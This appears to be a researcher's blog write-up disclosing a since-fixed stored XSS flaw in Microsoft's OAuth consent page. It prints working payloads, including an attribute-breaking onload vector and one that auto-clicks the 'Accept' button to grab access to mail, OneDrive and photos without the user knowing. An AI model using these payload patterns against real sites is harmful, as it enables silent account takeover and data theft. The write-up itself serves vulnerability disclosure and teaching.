Summary
In this article, I want to talk about one of my latest vulnerabilities that I found during my research, namely a Stored XSS(Cross Site Scripting) flaw in Microsoft OAuth Interface. My experience as a researcher with this company started two years ago when, out of curiosity, I began to look for the most common flaw which exists in almost all of the web applications, the common XSS. However, the final result was not as good as I expected, just a few XSS-es without a massive impact, but enough to make me appear in some of the Microsoft's "Acknowledgment Pages". Not long after this, Microsoft announced its official Bug Bounty program for "Online Services", but since I did not have enough time for it at that time, I decided not to participate.
Research
One day, while surfing through my Twitter feed, I discovered a very interesting article about a CSRF vulnerability discovered by Wesley Wineberg in the Microsoft OAuth Authorization interface (you can read about it here: here). This post made me curious and gave me confidence that I could find myself a vulnerability there, at least as important as that CSRF. Therefore, I decided to take a look at the Authorization part.
First of all, before using the OAuth framework along with my test application, I had to register that app. After some queries on Google, I found the following link: https://account.live.com/developers/applications/create?tou=1, which points to the "Microsoft account Developer Center" portal. Here, I found the registration form that allowed me to choose an "Application name" and the "Language" for my application.
As any user-input can be a possible open door for new XSS-es, I tried, as always, to insert a vector that may break the ice: '"></script><img src=x onerror=prompt(1)>. Unfortunately, the application rejected my payload and threw out an interesting error.
Digging into that error, we can easily observe that the most important characters from my payload: '<' and '>' weren't accepted, but there was nothing about the '(single quote) or "(double quote). Therefore, I made the following assumption: if I could find anywhere in the Authorization process a page that uses my input unencoded, as a value for a tag attribute or inside a script tag, maybe I would be able to break it and insert my javascript code. I tried first to use the vector "onload="alert(1), hoping that my payload will be added inside a HTML tag that supports the onload event.
I finished the registration process, and after I had set the redirection URL, I was able to generate the authorization link which corresponded to my application.
https://login.live.com/oauth20_authorize.srf?client_id=CLIENT_ID&scope=SCOPES&response_type=token&redirect_uri=REDIRECT_URI (you can find more about how Microsoft integrates OAuth2 here: https://msdn.microsoft.com/en-us/library/hh243647.aspx)
Opening it in a new tab was surprisingly enough to prove to me the existence of the bug:
In the source code of the page, we can see clearly how my input was parsed by the web application.
On line 212, my payload was used unencoded, as a value for the alt attribute along with a number between parentheses (which represents registration date and time of the application). The value of the src attribute is the standard value used in the case that the application owner did not choose an icon for his app, a link which points to an image from the Microsoft server. As that image will always exist there, the javascript code used as a value for the onload attribute will be executed at any new opening of the page.
Getting more from this flaw
Even if, at that moment, I had a valid vulnerability that could be sent for investigation, I decided to spend a little bit of time to see what the maximum impact of my bug is. A Cross-Site-Scripting vulnerability will always be in the top of the most significant flaws, but "Stealing Cookies" or "Phishing users" were just too boring for me :). So, I thought: Well, the bug exists in the web page which lets the user choose if he authorizes or denies the application access to its account and then this user expresses his decision by clicking on the "Yes" or "No" button. What if I insert a payload that will always click on the "Yes" button on behalf of the user? I could get permissions to access users resources without their knowledge! So far, so good. I created a new application and I added to it a new, improved payload: "onload="document.getElementById('idBtn_Accept').click()" param=" which was able to simulate a mouse-click on the "Yes" button at the web page load time.
What are the most valuable resources that a hacker could obtain from the victim?
Once the attacker managed to obtain access tokens for a particular account, he could set or get sensitive information from the victim's account. Among the most dangerous things that an attacker could have done, we can find:
- Reading all the emails from the Outlook account (using IMAP) and sending new emails on behalf of the user (using SMTP)
- Reading all the files stored in OneDrive
- Reading all the user's photos, videos, audio, and albums
How this flaw could be exploited easily
Considering that this XSS was stored and it did not require the user's interaction, it can be said that it could be easily exploited only by visiting a malicious link. Such link, spread on social networks (Facebook, Twitter, etc.) along with a good "story", could do many victims in a short span of time.
However, the victims would have to be logged into their Microsoft account or to do it at the moment when they opened the link, but this would not be an important problem.
# Fix
Microsoft fixed this issue, and now all dangerous characters are encoded with HTML entities.
Thanks for reading, @dekeeu
0 comments:
Post a Comment